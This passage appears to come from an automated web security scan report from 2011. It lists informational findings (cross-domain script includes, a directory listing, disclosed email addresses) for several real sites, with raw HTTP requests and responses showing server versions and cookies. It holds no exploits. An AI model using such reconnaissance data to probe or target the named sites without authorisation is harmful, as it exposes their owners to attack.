<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<script type="text/javascript" src="http://i.usatoday.net/_common/_scripts/_
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>

<script src="http://symbolcomplete.marketwatch.com/SymbolComplete/service.aspx?license=243391227070AE2A4A9752CBB727399B5969C0E2ECBFB2B3A01E585B950F63B63742DEEDF3B6DC0AECA370F53F357DF5527C71212A08BE321F61DB652CFC2854E2BD173549A6A87EC127C0A29B6AB4E82B2FE6FAEA1D1A4327EACC692DF31201EA6CB24F3DF5A97CAA2225FBEDCDE715F1CEFF77CB02259BDBB08087B10779F214B3FA86"></script>
...[SNIP]...
</script>

<script src="http://d.yimg.com/ds/badge.js"></script>
...[SNIP]...
</script>
<script src="http://d.yimg.com/ds/badge.js"></script>
...[SNIP]...

15.434. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</script>

   <SCRIPT type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=null" >
   </SCRIPT>
...[SNIP]...
<!-- /utility -->


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vaultaddthisuser"></script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

15.435. http://www.veterinarycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veterinarycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2mcsndiuf3f4gj6u05hhg3jfj5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 96324

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.436. http://www.volunteercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.volunteercrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=g51vkhrfm2pue55e02ud4e5mi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109074

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.437. http://www.woothemes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woothemes.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:51 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Fri, 21 Jan 2011 19:37:28 GMT
Vary: Cookie
Expires: Fri, 21 Jan 2011 20:37:28 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: a9602306e2be29cba5c13f300262aee7
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Content-Length: 25889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div> <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script> <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/woothemes.json?callback=twitterCallback2&amp;count=1"></script>
...[SNIP]...
</form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box-footer&amp;lang=en"></script>
...[SNIP]...

15.438. http://www.workathomecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.workathomecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3slq9onb09lnusoc4dh32k8bf6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117680

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.439. http://www.writingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.writingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:54 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2o6rg0j8fbtu2n6kkit7kt2526; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113096

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

16. Directory listing

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.answers.com
Path:   /topic/vinson-elkins-llp

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:

Request

GET /topic/vinson-elkins-llp HTTP/1.1
Host: www.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:39:52 GMT
Server: AWS
Set-Cookie: lc=nt013; path=/; domain=www.answers.com; expires=Fri, 04-Feb-2011 18:39:52 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=05EA67FCD231E20FB8B1E7B8BD5DBA11; Path=/
Set-Cookie: settings=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Expires=Sat, 21-Jan-2012 18:39:52 GMT; Path=/
Set-Cookie: settingsS=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Path=/
Set-Cookie: afid=0; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: GNFirstVisit=1295635192020; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: tacodaSession=; Path=/
Set-Cookie: nafid=0; Path=/
Set-Cookie: referrerDomainSession=none; Path=/
Set-Cookie: firstPageTypeSession=topic-page; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 69874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="IE IEnew IE7" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.
...[SNIP]...
<span class="tabTitle" title="International Directory of Company Histories &copy; 2006" >Gale Directory of Company Histories:</span>
...[SNIP]...
<b>Gale Directory of Company Histories</b>
...[SNIP]...
<u>International Directory of Company Histories</u>
...[SNIP]...

17. Email addresses disclosed
There are 32 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


17.1. http://www.aharrisonbarnes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:47 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=4quu0rekl19krf2nje0ll9eoh4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648507; expires=Sat, 21-Jan-2012 22:21:47 GMT; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91358

<script>
function ValidatorTrim_video(s)
{
var m = s.match(/^\s*(\S+(\s+\S+)*)\s*$/);
return (m == null) ? "" : m[1];
}

function checkEmail_video(strng)
{
   var error = "";
   if (strng == "")

...[SNIP]...
<a href="mailto:contact@aharrisonbarnes.com">
...[SNIP]...

17.2. http://www.aharrisonbarnes.com/contact-us/script/functions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /contact-us/script/functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /contact-us/script/functions.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 22 Jan 2011 00:17:06 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=a0f1qvin1rmg1u6sbvil1pk2c0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Last-Modified: Sat, 22 Jan 2011 00:17:07 GMT
Set-Cookie: wpgb_visit_last_php-default=1295655427; expires=Sun, 22-Jan-2012 00:17:07 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 93480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<a href="mailto:contact@aharrisonbarnes.com">
...[SNIP]...

17.3. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

Issue detail

The following email address was disclosed in the response:

Request

GET /do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:36 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=td5el2h9micq2p5p4knldobtl7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648498; expires=Sat, 21-Jan-2012 22:21:38 GMT; path=/
Link: <http://www.aharrisonbarnes.com/?p=1189>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 185016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="
...[SNIP]...
<a href="mailto:contact@aharrisonbarnes.com">
...[SNIP]...

17.4. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /push-yourself-outside-your-comfort-zone/

Issue detail

The following email address was disclosed in the response:

Request

GET /push-yourself-outside-your-comfort-zone/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:38 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=5o76npmpltlll2h6khib1qgu27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648499; expires=Sat, 21-Jan-2012 22:21:39 GMT; path=/
Link: <http://www.aharrisonbarnes.com/?p=14138>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 141561


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="
...[SNIP]...
<a href="mailto:contact@aharrisonbarnes.com">
...[SNIP]...

17.5. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 22 Jan 2011 00:14:21 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dtob70g4f8pltdn39q5stffbl1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Last-Modified: Sat, 22 Jan 2011 00:14:23 GMT
Set-Cookie: wpgb_visit_last_php-default=1295655263; expires=Sun, 22-Jan-2012 00:14:23 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 100571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<a href="mailto:contact@aharrisonbarnes.com">
...[SNIP]...

17.6. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/tabber.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /wp-content/themes/HB_new_theme/javascript/tabber.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/HB_new_theme/javascript/tabber.js HTTP/1.1
Host: www.aharrisonbarnes.com
Proxy-Connection: keep-alive
